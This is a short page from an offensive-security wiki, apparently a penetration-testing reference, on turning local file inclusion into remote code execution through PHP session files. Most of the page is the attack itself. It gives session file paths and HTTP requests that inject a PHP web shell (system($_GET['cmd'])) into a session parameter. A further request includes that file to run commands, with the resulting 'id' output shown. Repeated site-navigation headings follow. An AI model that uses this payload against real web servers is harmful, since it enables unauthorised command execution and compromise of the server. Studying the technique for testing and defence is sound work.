PHP session

When a web server wants to handle sessions, it can use PHP session cookies (PHPSESSID).

Finding where the sessions are stored.

Examples:

Linux : /var/lib/php5/sess_[PHPSESSID]
Linux : /var/lib/php/sessions/sess_[PHPSESSID]
Windows : C:\Windows\Temp\

Displaying a PHPSESSID to see if any parameter is reflected inside.

Example:

The user name for the session (from a parameter called user)
The language used by the user (from a parameter called lang)

Exemple :

http

GET /?user=/var/lib/php/sessions/sess_[PHPSESSID] HTTP/2

username|s:6:"tester";lang|s:7:"English";

3. Inject some PHP code in the reflected parameter in the session

http

GET /?user=<%3fphp+system($_GET['cmd'])%3b+%3f> HTTP/2

4. Call the session filewith the vulnerable parameter to trigger a command exection

http

GET /?user=/var/lib/php/sessions/sess_[PHPSESSID]&cmd=id HTTP/2

</h2> username|s:30:"uid=33(www-data) gid=33(www-data) groups=33(www-data)
";lang|s:7:"English";

Reconnaissance

Movement

Credentials

Dumping

Bruteforcing

MITM and coerced auths

NTLM

Kerberos

Forged tickets

Delegations

DACL abuse

Netlogon

Certificate Services (AD-CS)

SCCM / MECM

Exchange services

Print Spooler Service

Schannel

Built-ins & settings

Kerberos

Certificate Services (AD-CS)

HTTP security headers

Identity and Access Management

File inclusion

LFI to RCE

Initial access (protocols)

Windows

UNIX-like

(AV) Anti-Virus

Mifare Classic

Android

PHP session

Dumping

Bruteforcing

MITM and coerced auths

NTLM

Kerberos

Forged tickets

Delegations

DACL abuse

Certificate Services (AD-CS)

SCCM / MECM

Certificate Services (AD-CS)

HTTP security headers

File inclusion

LFI to RCE

Windows

UNIX-like

Mifare Classic

PHP session ​

PHP session